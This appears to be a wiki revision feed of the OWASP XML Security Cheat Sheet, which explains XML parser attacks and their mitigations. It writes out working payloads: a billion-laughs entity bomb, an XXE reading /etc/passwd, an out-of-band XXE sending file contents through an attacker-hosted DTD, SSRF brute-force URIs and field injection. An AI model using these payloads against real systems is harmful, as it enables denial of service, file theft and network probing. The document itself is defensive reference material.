The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 references to &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt; in its definition; each of these will then be resolved as 10 references to &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt;, and so on. Finally, the CPU and/or memory will be affected by expanding 10^9 (1,000,000,000) copies of the three-character string &amp;lt;tt&amp;gt;LOL&amp;lt;/tt&amp;gt;, about 3*10^9 (3,000,000,000) characters, which could make the parser crash.&lt;br /&gt;
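&lt;br /&gt;
The size of the expansion can be checked with a few lines of arithmetic. The following Java sketch is only a calculation, not an attack tool; the class &amp;lt;tt&amp;gt;EntityExpansionMath&amp;lt;/tt&amp;gt; and its method are hypothetical names:&lt;br /&gt;
&lt;br /&gt;
```java
// Hypothetical calculator for the size of a nested entity expansion.
class EntityExpansionMath {
  // Characters produced when a base string is repeated fanOut times at each
  // of the given number of nesting levels.
  static long nestedExpansion(long baseLength, long fanOut, int levels) {
    if (0 > levels) {
      throw new IllegalArgumentException("levels must not be negative");
    }
    long total = baseLength;
    for (int i = 0; i != levels; i++) {
      total = Math.multiplyExact(total, fanOut); // fails loudly on overflow
    }
    return total;
  }

  public static void main(String[] args) {
    // Three characters, ten references per level, nine levels (LOL1 to LOL9).
    System.out.println(nestedExpansion(3, 10, 9) + " characters");
  }
}
```
&lt;br /&gt;
The document itself is well under a kilobyte, which is what makes the ratio between the attacker's cost and the parser's cost so unfavorable.&lt;br /&gt;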
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message:&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;URN:PARASOFT:WS:STORE&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY '''xxe''' SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt;, whose value is the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt; and which is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file over HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY '''% xxe''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt; &lt;br /&gt;
  '''%xxe;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % '''file''' SYSTEM &amp;quot;'''file:///etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % '''dtd''' SYSTEM &amp;quot;'''http://attacker/evil.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
  '''%dtd;'''&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;send;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY % '''all''' &amp;quot;&amp;lt;!ENTITY '''send''' SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
 '''%all;'''&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL.&lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
  at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
  at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If the timeouts occur while you are trying to connect to a closed port (which may take one minute), the time of response when connected to a valid port will be very quick (one second, for example). The differences between open and closed ports become quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, and then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
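&lt;br /&gt;
The averaging step can be sketched in Java as follows. The class &amp;lt;tt&amp;gt;PortTimingClassifier&amp;lt;/tt&amp;gt;, the threshold, and the assumption that open ports answer faster than closed ones are all illustrative; as noted above, the direction of the difference depends on the implementation being tested:&lt;br /&gt;
&lt;br /&gt;
```java
// Hypothetical helper for comparing repeated response-time measurements.
class PortTimingClassifier {
  // Arithmetic mean of the measured response times, in milliseconds.
  static double mean(long[] samplesMs) {
    if (samplesMs.length == 0) {
      throw new IllegalArgumentException("at least one sample is required");
    }
    long sum = 0;
    for (long sample : samplesMs) {
      sum += sample;
    }
    return (double) sum / samplesMs.length;
  }

  // Assumption: responses faster than the threshold indicate an open port.
  static boolean looksOpen(long[] samplesMs, double thresholdMs) {
    return thresholdMs > mean(samplesMs);
  }
}
```
&lt;br /&gt;
A mean is sensitive to outliers, so on noisy networks a median or a larger number of samples may give a more stable result.&lt;br /&gt;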
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; in the URI (http, ftp, etc.). For example:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''user''' SYSTEM &amp;quot;http://'''username:password'''@example.com:8080&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;user;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
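&lt;br /&gt;
On the defensive side, an application that must resolve some external identifiers can at least refuse those that carry credentials. The following Java sketch relies on &amp;lt;tt&amp;gt;java.net.URI&amp;lt;/tt&amp;gt;; the class &amp;lt;tt&amp;gt;SystemIdPolicy&amp;lt;/tt&amp;gt; is hypothetical, and treating unparsable identifiers as suspicious is a design choice of this sketch:&lt;br /&gt;
&lt;br /&gt;
```java
import java.net.URI;
import java.net.URISyntaxException;

// Hypothetical policy check for system identifiers found in a DTD.
class SystemIdPolicy {
  // True when the identifier embeds credentials, such as
  // http://username:password@host, or cannot be parsed as a URI at all.
  static boolean shouldReject(String systemId) {
    try {
      return new URI(systemId).getRawUserInfo() != null;
    } catch (URISyntaxException e) {
      return true;
    }
  }
}
```
&lt;br /&gt;
A check of this kind could be called from an entity resolver before any connection is attempted.&lt;br /&gt;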
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;br /&gt;
&lt;br /&gt;
= Other Cheatsheets =&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;br /&gt;
[[Category:Popular]]&lt;br /&gt;
[[Category:OWASP_Breakers]]&lt;br /&gt;
{{TOC hidden}}&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224446</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224446"/>
				<updated>2016-12-21T21:13:02Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, compare the time taken to process a regular XML document with the time taken to process a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will replace the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section with the safe versions of these characters, even though it is not required: &lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources, causing a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.6.7 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack, since it requires only half the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, the attacker could buy a book without actually paying for it.&lt;br /&gt;
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD, which can express only a very limited set of restrictions compared to other schema languages. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1,000,000 digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. Both &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
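&lt;br /&gt;
As a rough sketch of how a more expressive schema language could close this gap, the same &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt; document might be described with XML Schema instead of DTD. The limits used here (a name of at most 256 characters and an age between 0 and 150 written with at most three digits) are illustrative assumptions, not values taken from any specification:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;person&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;name&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Assumed upper bound for a name --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxLength''' value=&amp;quot;256&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;age&amp;quot;&amp;gt;&lt;br /&gt;
      &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
       &amp;lt;xs:restriction base=&amp;quot;xs:nonNegativeInteger&amp;quot;&amp;gt;&lt;br /&gt;
        &amp;lt;!-- Assumed limits: at most three digits, value no greater than 150 --&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''pattern''' value=&amp;quot;[0-9]{1,3}&amp;quot;/&amp;gt;&lt;br /&gt;
        &amp;lt;xs:'''maxInclusive''' value=&amp;quot;150&amp;quot;/&amp;gt;&lt;br /&gt;
       &amp;lt;/xs:restriction&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
     &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The &amp;lt;tt&amp;gt;pattern&amp;lt;/tt&amp;gt; facet is included because a numeric range alone does not bound the length of the text: integer types accept leading zeros, so a very long string of zeros followed by a small number would otherwise still be valid.&lt;br /&gt;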
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
If you need to use a hexadecimal value, there is no point in defining it as a string that will later be restricted to the 16 hexadecimal characters. As an example of this scenario, when using XML encryption some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value, and considered the content valid. The first portion of the data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). The restrictions are only partially enforced for the element, which suggests that the information is tested by application code rather than against the proposed sample schema. &lt;br /&gt;
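&lt;br /&gt;
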